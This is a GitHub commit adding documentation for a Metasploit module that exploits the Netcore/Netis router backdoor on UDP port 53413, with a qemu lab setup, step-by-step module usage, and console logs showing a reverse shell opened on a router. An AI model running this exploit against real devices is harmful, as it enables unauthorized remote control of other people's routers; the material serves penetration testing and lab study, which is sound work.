Skip to content

Commit be65f2c

Browse files
committed
add module doc
1 parent 4a49041 commit be65f2c

File tree

1 file changed

+95
-0
lines changed

1 file changed

+95
-0
lines changed
Lines changed: 95 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,95 @@
1+
## Vulnerable Devices/Lab
2+
3+
### Vulnerable Devices
4+
Trend Micro lists "almost all" models as being vulnerable in August 2014.
5+
6+
Vulnerable AND Exploitable:
7+
8+
1. Netcore NI360 second-generation
9+
10+
Vulnerable, but not Exploitable via this module (details later):
11+
12+
1. Netis WF2414 firmware V1.4.27001
13+
14+
### Lab Emulation
15+
1. Install qemu
16+
2. Download and install mipsel. Please read the [tutorial](https://people.debian.org/%7Eaurel32/qemu/mipsel/README.txt)
17+
3. Starts the mipsel lab
18+
1. `qemu-system-mipsel -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mipsel_standard.qcow2 -append "root=/dev/sda1 console=tty0" -net nic -net user,hostfwd=tcp::22222-:22,hostfwd=udp::53413-:53413`
19+
4. Put [vuln_squashfs-root.tar.gz](https://github.com/rapid7/metasploit-framework/files/267284/vuln_squashfs-root.tar.gz) to mipsel lab, extract it.
20+
1. `scp -P22222 vuln_squashfs-root.tar.gz [email protected]:/root`
21+
2. `tar xvf vuln_squashfs-root.tar.gz`
22+
5. Run vuln programs.
23+
1. `cd nw614 && chroot . /bin/igdmptd`
24+
25+
## Verification Steps
26+
27+
1. Install the emulator/hardware
28+
2. Start msfconsole
29+
3. Do: `use exploits/linux/misc/netcore_udp_53413_backdoor`
30+
4. Do: `set RHOST <ip>`
31+
5. Do: `check`
32+
6. Do: `exploit`
33+
7. You should get a shell.
34+
35+
## Exploitability
36+
37+
As previously noted, some modules are vulnerable, but not currently exploitable via Metasploit.
38+
During [testing](https://github.com/rapid7/metasploit-framework/pull/6880#issuecomment-231597626) it was discovered that some modules implement an echo command that does not honor -ne. While it may be possible to still execute a shell, further investigation would need to be conducted.
39+
In these cases, it should be possible to use [other scripts](https://github.com/h00die/MSF-Testing-Scripts/blob/master/netis_backdoor.py) to act as a fake interactive shell.
40+
41+
## Scenarios
42+
43+
The following is an example of a vulnerable AND EXPLOITABLE router.
44+
45+
```
46+
use exploits/linux/misc/netcore_udp_53413_backdoor
47+
msf exploit(netcore_udp_53413_backdoor) > set RHOST 192.168.1.1
48+
RHOST => 192.168.1.1
49+
msf exploit(netcore_udp_53413_backdoor) > check
50+
[+] The target is vulnerable.
51+
msf exploit(netcore_udp_53413_backdoor) > run
52+
53+
[*] Started reverse TCP handler on 192.168.1.2:4444
54+
[*] Exploiting...
55+
[*] Command Stager progress - 12.54% done (196/1563 bytes)
56+
[*] Command Stager progress - 25.08% done (392/1563 bytes)
57+
[*] Command Stager progress - 37.62% done (588/1563 bytes)
58+
[*] Command Stager progress - 50.16% done (784/1563 bytes)
59+
[*] Command Stager progress - 62.70% done (980/1563 bytes)
60+
[*] Command Stager progress - 75.24% done (1176/1563 bytes)
61+
[*] Command Stager progress - 87.78% done (1372/1563 bytes)
62+
[*] Command Stager progress - 100.00% done (1563/1563 bytes)
63+
[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.1:54180) at 2016-05-16 00:52:43 -0500
64+
65+
pwd
66+
/
67+
ls
68+
bin
69+
cfg
70+
dev
71+
etc
72+
lib
73+
linuxrc
74+
log
75+
proc
76+
sbin
77+
sh
78+
sys
79+
tmp
80+
usr
81+
var
82+
web
83+
```
84+
85+
The following is an example of a vulnerable but NOT expoitable router.
86+
```
87+
msf > use exploits/linux/misc/netcore_udp_53413_backdoor
88+
msf exploit(netcore_udp_53413_backdoor) > set rhost 192.168.1.1
89+
rhost => 192.168.1.1
90+
msf exploit(netcore_udp_53413_backdoor) > check
91+
92+
[+] Backdoor Unlocked
93+
[*] Router backdoor triggered, but non-exploitable echo command detected. Not currently exploitable with Metasploit.
94+
[*] The target service is running, but could not be validated.
95+
```

0 commit comments

Comments
 (0)